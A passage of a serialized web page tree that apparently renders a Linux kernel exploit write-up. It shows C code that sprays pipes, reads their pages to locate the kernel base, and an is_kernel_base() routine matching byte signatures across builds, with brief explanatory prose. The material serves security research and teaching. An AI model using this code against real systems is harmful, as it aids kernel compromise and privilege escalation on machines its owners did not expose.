(",{"type":27,"tag":207,"props":65940,"children":65941},{"style":214},[65942],{"type":33,"value":26317},{"type":27,"tag":207,"props":65944,"children":65945},{"style":220},[65946],{"type":33,"value":15904},{"type":27,"tag":207,"props":65948,"children":65949},{"style":226},[65950],{"type":33,"value":229},{"type":27,"tag":207,"props":65952,"children":65953},{"style":232},[65954],{"type":33,"value":4680},{"type":27,"tag":207,"props":65956,"children":65957},{"style":238},[65958],{"type":33,"value":65959},"; j ",{"type":27,"tag":207,"props":65961,"children":65962},{"style":226},[65963],{"type":33,"value":9257},{"type":27,"tag":207,"props":65965,"children":65966},{"style":238},[65967],{"type":33,"value":65968}," PIPE_SPRAY; j",{"type":27,"tag":207,"props":65970,"children":65971},{"style":226},[65972],{"type":33,"value":4713},{"type":27,"tag":207,"props":65974,"children":65975},{"style":238},[65976],{"type":33,"value":10449},{"type":27,"tag":207,"props":65978,"children":65979},{"class":209,"line":4154},[65980],{"type":27,"tag":207,"props":65981,"children":65982},{"style":238},[65983],{"type":33,"value":38919},{"type":27,"tag":207,"props":65985,"children":65986},{"class":209,"line":4203},[65987,65992,65996,66000,66005,66009],{"type":27,"tag":207,"props":65988,"children":65989},{"style":1335},[65990],{"type":33,"value":65991}," memset",{"type":27,"tag":207,"props":65993,"children":65994},{"style":238},[65995],{"type":33,"value":1343},{"type":27,"tag":207,"props":65997,"children":65998},{"style":226},[65999],{"type":33,"value":10398},{"type":27,"tag":207,"props":66001,"children":66002},{"style":238},[66003],{"type":33,"value":66004},"data, ",{"type":27,"tag":207,"props":66006,"children":66007},{"style":232},[66008],{"type":33,"value":1660},{"type":27,"tag":207,"props":66010,"children":66011},{"style":238},[66012],{"type":33,"value":66013},", PAGE_SIZE);\n",{"type":27,"tag":207,"props":66015,"children":66016},{"class":209,"line":4249},[66017,66022],{"type":27,"tag":207,"props":66018,"children":66019},{"style":214},[66020],{"type":33,"value":66021}," int",{"type":27,"tag":207,"props":66023,"children":66024},{"style":238},[66025],{"type":33,"value":66026}," count;\n",{"type":27,"tag":207,"props":66028,"children":66029},{"class":209,"line":4290},[66030,66035,66040,66044,66049,66053,66058,66063,66067,66071,66075,66080,66084,66088],{"type":27,"tag":207,"props":66031,"children":66032},{"style":376},[66033],{"type":33,"value":66034}," if",{"type":27,"tag":207,"props":66036,"children":66037},{"style":238},[66038],{"type":33,"value":66039}," (count ",{"type":27,"tag":207,"props":66041,"children":66042},{"style":226},[66043],{"type":33,"value":10380},{"type":27,"tag":207,"props":66045,"children":66046},{"style":1335},[66047],{"type":33,"value":66048}," read",{"type":27,"tag":207,"props":66050,"children":66051},{"style":238},[66052],{"type":33,"value":1343},{"type":27,"tag":207,"props":66054,"children":66055},{"style":220},[66056],{"type":33,"value":66057},"pfd",{"type":27,"tag":207,"props":66059,"children":66060},{"style":238},[66061],{"type":33,"value":66062},"[j][",{"type":27,"tag":207,"props":66064,"children":66065},{"style":232},[66066],{"type":33,"value":1660},{"type":27,"tag":207,"props":66068,"children":66069},{"style":238},[66070],{"type":33,"value":30333},{"type":27,"tag":207,"props":66072,"children":66073},{"style":226},[66074],{"type":33,"value":10398},{"type":27,"tag":207,"props":66076,"children":66077},{"style":238},[66078],{"type":33,"value":66079},"data, PAGE_SIZE) ",{"type":27,"tag":207,"props":66081,"children":66082},{"style":226},[66083],{"type":33,"value":9257},{"type":27,"tag":207,"props":66085,"children":66086},{"style":232},[66087],{"type":33,"value":4680},{"type":27,"tag":207,"props":66089,"children":66090},{"style":238},[66091],{"type":33,"value":10449},{"type":27,"tag":207,"props":66093,"children":66094},{"class":209,"line":4304},[66095],{"type":27,"tag":207,"props":66096,"children":66097},{"style":238},[66098],{"type":33,"value":38955},{"type":27,"tag":207,"props":66100,"children":66101},{"class":209,"line":5466},[66102,66107],{"type":27,"tag":207,"props":66103,"children":66104},{"style":376},[66105],{"type":33,"value":66106}," continue",{"type":27,"tag":207,"props":66108,"children":66109},{"style":238},[66110],{"type":33,"value":241},{"type":27,"tag":207,"props":66112,"children":66113},{"class":209,"line":5530},[66114],{"type":27,"tag":207,"props":66115,"children":66116},{"style":238},[66117],{"type":33,"value":66118}," }\n",{"type":27,"tag":207,"props":66120,"children":66121},{"class":209,"line":7900},[66122],{"type":27,"tag":207,"props":66123,"children":66124},{"style":238},[66125],{"type":33,"value":17595},{"type":27,"tag":207,"props":66127,"children":66128},{"class":209,"line":7909},[66129],{"type":27,"tag":207,"props":66130,"children":66131},{"emptyLinePlaceholder":19},[66132],{"type":33,"value":2062},{"type":27,"tag":207,"props":66134,"children":66135},{"class":209,"line":7917},[66136,66141,66146,66150,66154],{"type":27,"tag":207,"props":66137,"children":66138},{"style":238},[66139],{"type":33,"value":66140}," if (",{"type":27,"tag":207,"props":66142,"children":66143},{"style":8920},[66144],{"type":33,"value":66145},"is_kernel_base",{"type":27,"tag":207,"props":66147,"children":66148},{"style":238},[66149],{"type":33,"value":1343},{"type":27,"tag":207,"props":66151,"children":66152},{"style":8920},[66153],{"type":33,"value":9468},{"type":27,"tag":207,"props":66155,"children":66156},{"style":238},[66157],{"type":33,"value":66158},")) // [1] identify kernel base\n",{"type":27,"tag":207,"props":66160,"children":66161},{"class":209,"line":7926},[66162],{"type":27,"tag":207,"props":66163,"children":66164},{"style":238},[66165],{"type":33,"value":38955},{"type":27,"tag":207,"props":66167,"children":66168},{"class":209,"line":7934},[66169,66174,66178,66182],{"type":27,"tag":207,"props":66170,"children":66171},{"style":238},[66172],{"type":33,"value":66173}," found ",{"type":27,"tag":207,"props":66175,"children":66176},{"style":226},[66177],{"type":33,"value":10380},{"type":27,"tag":207,"props":66179,"children":66180},{"style":214},[66181],{"type":33,"value":19746},{"type":27,"tag":207,"props":66183,"children":66184},{"style":238},[66185],{"type":33,"value":241},{"type":27,"tag":207,"props":66187,"children":66188},{"class":209,"line":7943},[66189,66194],{"type":27,"tag":207,"props":66190,"children":66191},{"style":376},[66192],{"type":33,"value":66193}," break",{"type":27,"tag":207,"props":66195,"children":66196},{"style":238},[66197],{"type":33,"value":241},{"type":27,"tag":207,"props":66199,"children":66200},{"class":209,"line":7952},[66201],{"type":27,"tag":207,"props":66202,"children":66203},{"style":238},[66204],{"type":33,"value":66118},{"type":27,"tag":207,"props":66206,"children":66207},{"class":209,"line":7961},[66208],{"type":27,"tag":207,"props":66209,"children":66210},{"style":238},[66211],{"type":33,"value":10637},{"type":27,"tag":207,"props":66213,"children":66214},{"class":209,"line":7969},[66215],{"type":27,"tag":207,"props":66216,"children":66217},{"emptyLinePlaceholder":19},[66218],{"type":33,"value":2062},{"type":27,"tag":207,"props":66220,"children":66221},{"class":209,"line":7978},[66222],{"type":27,"tag":207,"props":66223,"children":66224},{"style":238},[66225],{"type":33,"value":17595},{"type":27,"tag":36,"props":66227,"children":66228},{},[66229,66231,66235,66237,66243,66245,66249],{"type":33,"value":66230},"Notice that at ",{"type":27,"tag":207,"props":66232,"children":66233},{},[66234],{"type":33,"value":1651},{"type":33,"value":66236}," we call the ",{"type":27,"tag":84,"props":66238,"children":66240},{"className":66239},[],[66241],{"type":33,"value":66242},"is_kernel_base()",{"type":33,"value":66244}," function. This is a function based on lau's exploit ",{"type":27,"tag":207,"props":66246,"children":66247},{},[66248],{"type":33,"value":1152},{"type":33,"value":66250}," that basically matches for multiple byte patterns that may exist at the kernel base page across different builds, to maximize compatibility.",{"type":27,"tag":101,"props":66252,"children":66254},{"className":8877,"code":66253,"language":8876,"meta":7,"style":7},"[...]\nstatic bool is_kernel_base(unsigned char *addr)\n{\n // thanks lau :)\n\n // get-sig kernel_runtime_1\n if (memcmp(addr + 0x0, \"\\x48\\x8d\\x25\\x51\\x3f\", 5) == 0 &&\n memcmp(addr + 0x7, \"\\x48\\x8d\\x3d\\xf2\\xff\\xff\\xff\", 7) == 0)\n return true;\n\n // get-sig kernel_runtime_2\n if (memcmp(addr + 0x0, \"\\xfc\\x0f\\x01\\x15\", 4) == 0 &&\n memcmp(addr + 0x8, \"\\xb8\\x10\\x00\\x00\\x00\\x8e\\xd8\\x8e\\xc0\\x8e\\xd0\\xbf\", 12) == 0 &&\n memcmp(addr + 0x18, \"\\x89\\xde\\x8b\\x0d\", 4) == 0 &&\n memcmp(addr + 0x20, \"\\xc1\\xe9\\x02\\xf3\\xa5\\xbc\", 6) == 0 &&\n memcmp(addr + 0x2a, \"\\x0f\\x20\\xe0\\x83\\xc8\\x20\\x0f\\x22\\xe0\\xb9\\x80\\x00\\x00\\xc0\\x0f\\x32\\x0f\\xba\\xe8\\x08\\x0f\\x30\\xb8\\x00\", 24) == 0 &&\n memcmp(addr + 0x45, \"\\x0f\\x22\\xd8\\xb8\\x01\\x00\\x00\\x80\\x0f\\x22\\xc0\\xea\\x57\\x00\\x00\", 15) == 0 &&\n memcmp(addr + 0x55, \"\\x08\\x00\\xb9\\x01\\x01\\x00\\xc0\\xb8\", 8) == 0 &&\n memcmp(addr + 0x61, \"\\x31\\xd2\\x0f\\x30\\xe8\", 5) == 0 &&\n memcmp(addr + 0x6a, \"\\x48\\xc7\\xc6\", 3) == 0 &&\n memcmp(addr + 0x71, \"\\x48\\xc7\\xc0\\x80\\x00\\x00\", 6) == 0 &&\n memcmp(addr + 0x78, \"\\xff\\xe0\", 2) == 0)\n return true;\n\n return false;\n}\n[...]\n",[66255],{"type":27,"tag":84,"props":66256,"children":66257},{"__ignoreMap":7},[66258,66265,66295,66302,66310,66317,66325,66396,66458,66473,66480,66488,66556,66618,66679,66740,66802,66863,66924,66985,67046,67107,67168,67183,67190,67205,67212],{"type":27,"tag":207,"props":66259,"children":66260},{"class":209,"line":210},[66261],{"type":27,"tag":207,"props":66262,"children":66263},{"style":238},[66264],{"type":33,"value":17595},{"type":27,"tag":207,"props":66266,"children":66267},{"class":209,"line":244},[66268,66273,66278,66283,66287,66291],{"type":27,"tag":207,"props":66269,"children":66270},{"style":238},[66271],{"type":33,"value":66272},"static bool is_kernel_base(",{"type":27,"tag":207,"props":66274,"children":66275},{"style":214},[66276],{"type":33,"value":66277},"unsigned",{"type":27,"tag":207,"props":66279,"children":66280},{"style":214},[66281],{"type":33,"value":66282}," char",{"type":27,"tag":207,"props":66284,"children":66285},{"style":214},[66286],{"type":33,"value":17093},{"type":27,"tag":207,"props":66288,"children":66289},{"style":220},[66290],{"type":33,"value":37948},{"type":27,"tag":207,"props":66292,"children":66293},{"style":238},[66294],{"type":33,"value":10449},{"type":27,"tag":207,"props":66296,"children":66297},{"class":209,"line":270},[66298],{"type":27,"tag":207,"props":66299,"children":66300},{"style":238},[66301],{"type":33,"value":18158},{"type":27,"tag":207,"props":66303,"children":66304},{"class":209,"line":296},[66305],{"type":27,"tag":207,"props":66306,"children":66307},{"style":4647},[66308],{"type":33,"value":66309}," // thanks lau :)\n",{"type":27,"tag":207,"props":66311,"children":66312},{"class":209,"line":445},[66313],{"type":27,"tag":207,"props":66314,"children":66315},{"emptyLinePlaceholder":19},[66316],{"type":33,"value":2062},{"type":27,"tag":207,"props":66318,"children":66319},{"class":209,"line":867},[66320],{"type":27,"tag":207,"props":66321,"children":66322},{"style":4647},[66323],{"type":33,"value":66324}," // get-sig kernel_runtime_1\n",{"type":27,"tag":207,"props":66326,"children":66327},{"class":209,"line":892},[66328,66332,66336,66341,66346,66350,66355,66359,66363,66368,66372,66376,66380,66384,66388,66392],{"type":27,"tag":207,"props":66329,"children":66330},{"style":376},[66331],{"type":33,"value":19556},{"type":27,"tag":207,"props":66333,"children":66334},{"style":238},[66335],{"type":33,"value":686},{"type":27,"tag":207,"props":66337,"children":66338},{"style":1335},[66339],{"type":33,"value":66340},"memcmp",{"type":27,"tag":207,"props":66342,"children":66343},{"style":238},[66344],{"type":33,"value":66345},"(addr ",{"type":27,"tag":207,"props":66347,"children":66348},{"style":226},[66349],{"type":33,"value":2227},{"type":27,"tag":207,"props":66351,"children":66352},{"style":232},[66353],{"type":33,"value":66354}," 0x0",{"type":27,"tag":207,"props":66356,"children":66357},{"style":238},[66358],{"type":33,"value":1123},{"type":27,"tag":207,"props":66360,"children":66361},{"style":1325},[66362],{"type":33,"value":27331},{"type":27,"tag":207,"props":66364,"children":66365},{"style":55613},[66366],{"type":33,"value":66367},"\\x48\\x8d\\x25\\x51\\x3f",{"type":27,"tag":207,"props":66369,"children":66370},{"style":1325},[66371],{"type":33,"value":27331},{"type":27,"tag":207,"props":66373,"children":66374},{"style":238},[66375],{"type":33,"value":1123},{"type":27,"tag":207,"props":66377,"children":66378},{"style":232},[66379],{"type":33,"value":1152},{"type":27,"tag":207,"props":66381,"children":66382},{"style":238},[66383],{"type":33,"value":2222},{"type":27,"tag":207,"props":66385,"children":66386},{"style":226},[66387],{"type":33,"value":15856},{"type":27,"tag":207,"props":66389,"children":66390},{"style":232},[66391],{"type":33,"value":4680},{"type":27,"tag":207,"props":66393,"children":66394},{"style":226},[66395],{"type":33,"value":59920},{"type":27,"tag":207,"props":66397,"children":66398},{"class":209,"line":1475},[66399,66404,66408,66412,66417,66421,66425,66430,66434,66438,66442,66446,66450,66454],{"type":27,"tag":207,"props":66400,"children":66401},{"style":1335},[66402],{"type":33,"value":66403}," memcmp",{"type":27,"tag":207,"props":66405,"children":66406},{"style":238},[66407],{"type":33,"value":66345},{"type":27,"tag":207,"props":66409,"children":66410},{"style":226},[66411],{"type":33,"value":2227},{"type":27,"tag":207,"props":66413,"children":66414},{"style":232},[66415],{"type":33,"value":66416}," 0x7",{"type":27,"tag":207,"props":66418,"children":66419},{"style":238},[66420],{"type":33,"value":1123},{"type":27,"tag":207,"props":66422,"children":66423},{"style":1325},[66424],{"type":33,"value":27331},{"type":27,"tag":207,"props":66426,"children":66427},{"style":55613},[66428],{"type":33,"value":66429},"\\x48\\x8d\\x3d\\xf2\\xff\\xff\\xff",{"type":27,"tag":207,"props":66431,"children":66432},{"style":1325},[66433],{"type":33,"value":27331},{"type":27,"tag":207,"props":66435,"children":66436},{"style":238},[66437],{"type":33,"value":1123},{"type":27,"tag":207,"props":66439,"children":66440},{"style":232},[66441],{"type":33,"value":1769},{"type":27,"tag":207,"props":66443,"children":66444},{"style":238},[66445],{"type":33,"value":2222},{"type":27,"tag":207,"props":66447,"children":66448},{"style":226},[66449],{"type":33,"value":15856},{"type":27,"tag":207,"props":66451,"children":66452},{"style":232},[66453],{"type":33,"value":4680},{"type":27,"tag":207,"props":66455,"children":66456},{"style":238},[66457],{"type":33,"value":10449},{"type":27,"tag":207,"props":66459,"children":66460},{"class":209,"line":2065},[66461,66465,66469],{"type":27,"tag":207,"props":66462,"children":66463},{"style":376},[66464],{"type":33,"value":23019},{"type":27,"tag":207,"props":66466,"children":66467},{"style":214},[66468],{"type":33,"value":19746},{"type":27,"tag":207,"props":66470,"children":66471},{"style":238},[66472],{"type":33,"value":241},{"type":27,"tag":207,"props":66474,"children":66475},{"class":209,"line":2092},[66476],{"type":27,"tag":207,"props":66477,"children":66478},{"emptyLinePlaceholder":19},[66479],{"type":33,"value":2062},{"type":27,"tag":207,"props":66481,"children":66482},{"class":209,"line":2130},[66483],{"type":27,"tag":207,"props":66484,"children":66485},{"style":4647},[66486],{"type":33,"value":66487}," // get-sig kernel_runtime_2\n",{"type":27,"tag":207,"props":66489,"children":66490},{"class":209,"line":2168},[66491,66495,66499,66503,66507,66511,66515,66519,66523,66528,66532,66536,66540,66544,66548,66552],{"type":27,"tag":207,"props":66492,"children":66493},{"style":376},[66494],{"type":33,"value":19556},{"type":27,"tag":207,"props":66496,"children":66497},{"style":238},[66498],{"type":33,"value":686},{"type":27,"tag":207,"props":66500,"children":66501},{"style":1335},[66502],{"type":33,"value":66340},{"type":27,"tag":207,"props":66504,"children":66505},{"style":238},[66506],{"type":33,"value":66345},{"type":27,"tag":207,"props":66508,"children":66509},{"style":226},[66510],{"type":33,"value":2227},{"type":27,"tag":207,"props":66512,"children":66513},{"style":232},[66514],{"type":33,"value":66354},{"type":27,"tag":207,"props":66516,"children":66517},{"style":238},[66518],{"type":33,"value":1123},{"type":27,"tag":207,"props":66520,"children":66521},{"style":1325},[66522],{"type":33,"value":27331},{"type":27,"tag":207,"props":66524,"children":66525},{"style":55613},[66526],{"type":33,"value":66527},"\\xfc\\x0f\\x01\\x15",{"type":27,"tag":207,"props":66529,"children":66530},{"style":1325},[66531],{"type":33,"value":27331},{"type":27,"tag":207,"props":66533,"children":66534},{"style":238},[66535],{"type":33,"value":1123},{"type":27,"tag":207,"props":66537,"children":66538},{"style":232},[66539],{"type":33,"value":1693},{"type":27,"tag":207,"props":66541,"children":66542},{"style":238},[66543],{"type":33,"value":2222},{"type":27,"tag":207,"props":66545,"children":66546},{"style":226},[66547],{"type":33,"value":15856},{"type":27,"tag":207,"props":66549,"children":66550},{"style":232},[66551],{"type":33,"value":4680},{"type":27,"tag":207,"props":66553,"children":66554},{"style":226},[66555],{"type":33,"value":59920},{"type":27,"tag":207,"props":66557,"children":66558},{"class":209,"line":4095},[66559,66563,66567,66571,66576,66580,66584,66589,66593,66597,66602,66606,66610,66614],{"type":27,"tag":207,"props":66560,"children":66561},{"style":1335},[66562],{"type":33,"value":66403},{"type":27,"tag":207,"props":66564,"children":66565},{"style":238},[66566],{"type":33,"value":66345},{"type":27,"tag":207,"props":66568,"children":66569},{"style":226},[66570],{"type":33,"value":2227},{"type":27,"tag":207,"props":66572,"children":66573},{"style":232},[66574],{"type":33,"value":66575}," 0x8",{"type":27,"tag":207,"props":66577,"children":66578},{"style":238},[66579],{"type":33,"value":1123},{"type":27,"tag":207,"props":66581,"children":66582},{"style":1325},[66583],{"type":33,"value":27331},{"type":27,"tag":207,"props":66585,"children":66586},{"style":55613},[66587],{"type":33,"value":66588},"\\xb8\\x10\\x00\\x00\\x00\\x8e\\xd8\\x8e\\xc0\\x8e\\xd0\\xbf",{"type":27,"tag":207,"props":66590,"children":66591},{"style":1325},[66592],{"type":33,"value":27331},{"type":27,"tag":207,"props":66594,"children":66595},{"style":238},[66596],{"type":33,"value":1123},{"type":27,"tag":207,"props":66598,"children":66599},{"style":232},[66600],{"type":33,"value":66601},"12",{"type":27,"tag":207,"props":66603,"children":66604},{"style":238},[66605],{"type":33,"value":2222},{"type":27,"tag":207,"props":66607,"children":66608},{"style":226},[66609],{"type":33,"value":15856},{"type":27,"tag":207,"props":66611,"children":66612},{"style":232},[66613],{"type":33,"value":4680},{"type":27,"tag":207,"props":66615,"children":66616},{"style":226},[66617],{"type":33,"value":59920},{"type":27,"tag":207,"props":66619,"children":66620},{"class":209,"line":4103},[66621,66625,66629,66633,66638,66642,66646,66651,66655,66659,66663,66667,66671,66675],{"type":27,"tag":207,"props":66622,"children":66623},{"style":1335},[66624],{"type":33,"value":66403},{"type":27,"tag":207,"props":66626,"children":66627},{"style":238},[66628],{"type":33,"value":66345},{"type":27,"tag":207,"props":66630,"children":66631},{"style":226},[66632],{"type":33,"value":2227},{"type":27,"tag":207,"props":66634,"children":66635},{"style":232},[66636],{"type":33,"value":66637}," 0x18",{"type":27,"tag":207,"props":66639,"children":66640},{"style":238},[66641],{"type":33,"value":1123},{"type":27,"tag":207,"props":66643,"children":66644},{"style":1325},[66645],{"type":33,"value":27331},{"type":27,"tag":207,"props":66647,"children":66648},{"style":55613},[66649],{"type":33,"value":66650},"\\x89\\xde\\x8b\\x0d",{"type":27,"tag":207,"props":66652,"children":66653},{"style":1325},[66654],{"type":33,"value":27331},{"type":27,"tag":207,"props":66656,"children":66657},{"style":238},[66658],{"type":33,"value":1123},{"type":27,"tag":207,"props":66660,"children":66661},{"style":232},[66662],{"type":33,"value":1693},{"type":27,"tag":207,"props":66664,"children":66665},{"style":238},[66666],{"type":33,"value":2222},{"type":27,"tag":207,"props":66668,"children":66669},{"style":226},[66670],{"type":33,"value":15856},{"type":27,"tag":207,"props":66672,"children":66673},{"style":232},[66674],{"type":33,"value":4680},{"type":27,"tag":207,"props":66676,"children":66677},{"style":226},[66678],{"type":33,"value":59920},{"type":27,"tag":207,"props":66680,"children":66681},{"class":209,"line":4154},[66682,66686,66690,66694,66699,66703,66707,66712,66716,66720,66724,66728,66732,66736],{"type":27,"tag":207,"props":66683,"children":66684},{"style":1335},[66685],{"type":33,"value":66403},{"type":27,"tag":207,"props":66687,"children":66688},{"style":238},[66689],{"type":33,"value":66345},{"type":27,"tag":207,"props":66691,"children":66692},{"style":226},[66693],{"type":33,"value":2227},{"type":27,"tag":207,"props":66695,"children":66696},{"style":232},[66697],{"type":33,"value":66698}," 0x20",{"type":27,"tag":207,"props":66700,"children":66701},{"style":238},[66702],{"type":33,"value":1123},{"type":27,"tag":207,"props":66704,"children":66705},{"style":1325},[66706],{"type":33,"value":27331},{"type":27,"tag":207,"props":66708,"children":66709},{"style":55613},[66710],{"type":33,"value":66711},"\\xc1\\xe9\\x02\\xf3\\xa5\\xbc",{"type":27,"tag":207,"props":66713,"children":66714},{"style":1325},[66715],{"type":33,"value":27331},{"type":27,"tag":207,"props":66717,"children":66718},{"style":238},[66719],{"type":33,"value":1123},{"type":27,"tag":207,"props":66721,"children":66722},{"style":232},[66723],{"type":33,"value":2693},{"type":27,"tag":207,"props":66725,"children":66726},{"style":238},[66727],{"type":33,"value":2222},{"type":27,"tag":207,"props":66729,"children":66730},{"style":226},[66731],{"type":33,"value":15856},{"type":27,"tag":207,"props":66733,"children":66734},{"style":232},[66735],{"type":33,"value":4680},{"type":27,"tag":207,"props":66737,"children":66738},{"style":226},[66739],{"type":33,"value":59920},{"type":27,"tag":207,"props":66741,"children":66742},{"class":209,"line":4203},[66743,66747,66751,66755,66760,66764,66768,66773,66777,66781,66786,66790,66794,66798],{"type":27,"tag":207,"props":66744,"children":66745},{"style":1335},[66746],{"type":33,"value":66403},{"type":27,"tag":207,"props":66748,"children":66749},{"style":238},[66750],{"type":33,"value":66345},{"type":27,"tag":207,"props":66752,"children":66753},{"style":226},[66754],{"type":33,"value":2227},{"type":27,"tag":207,"props":66756,"children":66757},{"style":232},[66758],{"type":33,"value":66759}," 0x2a",{"type":27,"tag":207,"props":66761,"children":66762},{"style":238},[66763],{"type":33,"value":1123},{"type":27,"tag":207,"props":66765,"children":66766},{"style":1325},[66767],{"type":33,"value":27331},{"type":27,"tag":207,"props":66769,"children":66770},{"style":55613},[66771],{"type":33,"value":66772},"\\x0f\\x20\\xe0\\x83\\xc8\\x20\\x0f\\x22\\xe0\\xb9\\x80\\x00\\x00\\xc0\\x0f\\x32\\x0f\\xba\\xe8\\x08\\x0f\\x30\\xb8\\x00",{"type":27,"tag":207,"props":66774,"children":66775},{"style":1325},[66776],{"type":33,"value":27331},{"type":27,"tag":207,"props":66778,"children":66779},{"style":238},[66780],{"type":33,"value":1123},{"type":27,"tag":207,"props":66782,"children":66783},{"style":232},[66784],{"type":33,"value":66785},"24",{"type":27,"tag":207,"props":66787,"children":66788},{"style":238},[66789],{"type":33,"value":2222},{"type":27,"tag":207,"props":66791,"children":66792},{"style":226},[66793],{"type":33,"value":15856},{"type":27,"tag":207,"props":66795,"children":66796},{"style":232},[66797],{"type":33,"value":4680},{"type":27,"tag":207,"props":66799,"children":66800},{"style":226},[66801],{"type":33,"value":59920},{"type":27,"tag":207,"props":66803,"children":66804},{"class":209,"line":4249},[66805,66809,66813,66817,66822,66826,66830,66835,66839,66843,66847,66851,66855,66859],{"type":27,"tag":207,"props":66806,"children":66807},{"style":1335},[66808],{"type":33,"value":66403},{"type":27,"tag":207,"props":66810,"children":66811},{"style":238},[66812],{"type":33,"value":66345},{"type":27,"tag":207,"props":66814,"children":66815},{"style":226},[66816],{"type":33,"value":2227},{"type":27,"tag":207,"props":66818,"children":66819},{"style":232},[66820],{"type":33,"value":66821}," 0x45",{"type":27,"tag":207,"props":66823,"children":66824},{"style":238},[66825],{"type":33,"value":1123},{"type":27,"tag":207,"props":66827,"children":66828},{"style":1325},[66829],{"type":33,"value":27331},{"type":27,"tag":207,"props":66831,"children":66832},{"style":55613},[66833],{"type":33,"value":66834},"\\x0f\\x22\\xd8\\xb8\\x01\\x00\\x00\\x80\\x0f\\x22\\xc0\\xea\\x57\\x00\\x00",{"type":27,"tag":207,"props":66836,"children":66837},{"style":1325},[66838],{"type":33,"value":27331},{"type":27,"tag":207,"props":66840,"children":66841},{"style":238},[66842],{"type":33,"value":1123},{"type":27,"tag":207,"props":66844,"children":66845},{"style":232},[66846],{"type":33,"value":3651},{"type":27,"tag":207,"props":66848,"children":66849},{"style":238},[66850],{"type":33,"value":2222},{"type":27,"tag":207,"props":66852,"children":66853},{"style":226},[66854],{"type":33,"value":15856},{"type":27,"tag":207,"props":66856,"children":66857},{"style":232},[66858],{"type":33,"value":4680},{"type":27,"tag":207,"props":66860,"children":66861},{"style":226},[66862],{"type":33,"value":59920},{"type":27,"tag":207,"props":66864,"children":66865},{"class":209,"line":4290},[66866,66870,66874,66878,66883,66887,66891,66896,66900,66904,66908,66912,66916,66920],{"type":27,"tag":207,"props":66867,"children":66868},{"style":1335},[66869],{"type":33,"value":66403},{"type":27,"tag":207,"props":66871,"children":66872},{"style":238},[66873],{"type":33,"value":66345},{"type":27,"tag":207,"props":66875,"children":66876},{"style":226},[66877],{"type":33,"value":2227},{"type":27,"tag":207,"props":66879,"children":66880},{"style":232},[66881],{"type":33,"value":66882}," 0x55",{"type":27,"tag":207,"props":66884,"children":66885},{"style":238},[66886],{"type":33,"value":1123},{"type":27,"tag":207,"props":66888,"children":66889},{"style":1325},[66890],{"type":33,"value":27331},{"type":27,"tag":207,"props":66892,"children":66893},{"style":55613},[66894],{"type":33,"value":66895},"\\x08\\x00\\xb9\\x01\\x01\\x00\\xc0\\xb8",{"type":27,"tag":207,"props":66897,"children":66898},{"style":1325},[66899],{"type":33,"value":27331},{"type":27,"tag":207,"props":66901,"children":66902},{"style":238},[66903],{"type":33,"value":1123},{"type":27,"tag":207,"props":66905,"children":66906},{"style":232},[66907],{"type":33,"value":3578},{"type":27,"tag":207,"props":66909,"children":66910},{"style":238},[66911],{"type":33,"value":2222},{"type":27,"tag":207,"props":66913,"children":66914},{"style":226},[66915],{"type":33,"value":15856},{"type":27,"tag":207,"props":66917,"children":66918},{"style":232},[66919],{"type":33,"value":4680},{"type":27,"tag":207,"props":66921,"children":66922},{"style":226},[66923],{"type":33,"value":59920},{"type":27,"tag":207,"props":66925,"children":66926},{"class":209,"line":4304},[66927,66931,66935,66939,66944,66948,66952,66957,66961,66965,66969,66973,66977,66981],{"type":27,"tag":207,"props":66928,"children":66929},{"style":1335},[66930],{"type":33,"value":66403},{"type":27,"tag":207,"props":66932,"children":66933},{"style":238},[66934],{"type":33,"value":66345},{"type":27,"tag":207,"props":66936,"children":66937},{"style":226},[66938],{"type":33,"value":2227},{"type":27,"tag":207,"props":66940,"children":66941},{"style":232},[66942],{"type":33,"value":66943}," 0x61",{"type":27,"tag":207,"props":66945,"children":66946},{"style":238},[66947],{"type":33,"value":1123},{"type":27,"tag":207,"props":66949,"children":66950},{"style":1325},[66951],{"type":33,"value":27331},{"type":27,"tag":207,"props":66953,"children":66954},{"style":55613},[66955],{"type":33,"value":66956},"\\x31\\xd2\\x0f\\x30\\xe8",{"type":27,"tag":207,"props":66958,"children":66959},{"style":1325},[66960],{"type":33,"value":27331},{"type":27,"tag":207,"props":66962,"children":66963},{"style":238},[66964],{"type":33,"value":1123},{"type":27,"tag":207,"props":66966,"children":66967},{"style":232},[66968],{"type":33,"value":1152},{"type":27,"tag":207,"props":66970,"children":66971},{"style":238},[66972],{"type":33,"value":2222},{"type":27,"tag":207,"props":66974,"children":66975},{"style":226},[66976],{"type":33,"value":15856},{"type":27,"tag":207,"props":66978,"children":66979},{"style":232},[66980],{"type":33,"value":4680},{"type":27,"tag":207,"props":66982,"children":66983},{"style":226},[66984],{"type":33,"value":59920},{"type":27,"tag":207,"props":66986,"children":66987},{"class":209,"line":5466},[66988,66992,66996,67000,67005,67009,67013,67018,67022,67026,67030,67034,67038,67042],{"type":27,"tag":207,"props":66989,"children":66990},{"style":1335},[66991],{"type":33,"value":66403},{"type":27,"tag":207,"props":66993,"children":66994},{"style":238},[66995],{"type":33,"value":66345},{"type":27,"tag":207,"props":66997,"children":66998},{"style":226},[66999],{"type":33,"value":2227},{"type":27,"tag":207,"props":67001,"children":67002},{"style":232},[67003],{"type":33,"value":67004}," 0x6a",{"type":27,"tag":207,"props":67006,"children":67007},{"style":238},[67008],{"type":33,"value":1123},{"type":27,"tag":207,"props":67010,"children":67011},{"style":1325},[67012],{"type":33,"value":27331},{"type":27,"tag":207,"props":67014,"children":67015},{"style":55613},[67016],{"type":33,"value":67017},"\\x48\\xc7\\xc6",{"type":27,"tag":207,"props":67019,"children":67020},{"style":1325},[67021],{"type":33,"value":27331},{"type":27,"tag":207,"props":67023,"children":67024},{"style":238},[67025],{"type":33,"value":1123},{"type":27,"tag":207,"props":67027,"children":67028},{"style":232},[67029],{"type":33,"value":1735},{"type":27,"tag":207,"props":67031,"children":67032},{"style":238},[67033],{"type":33,"value":2222},{"type":27,"tag":207,"props":67035,"children":67036},{"style":226},[67037],{"type":33,"value":15856},{"type":27,"tag":207,"props":67039,"children":67040},{"style":232},[67041],{"type":33,"value":4680},{"type":27,"tag":207,"props":67043,"children":67044},{"style":226},[67045],{"type":33,"value":59920},{"type":27,"tag":207,"props":67047,"children":67048},{"class":209,"line":5530},[67049,67053,67057,67061,67066,67070,67074,67079,67083,67087,67091,67095,67099,67103],{"type":27,"tag":207,"props":67050,"children":67051},{"style":1335},[67052],{"type":33,"value":66403},{"type":27,"tag":207,"props":67054,"children":67055},{"style":238},[67056],{"type":33,"value":66345},{"type":27,"tag":207,"props":67058,"children":67059},{"style":226},[67060],{"type":33,"value":2227},{"type":27,"tag":207,"props":67062,"children":67063},{"style":232},[67064],{"type":33,"value":67065}," 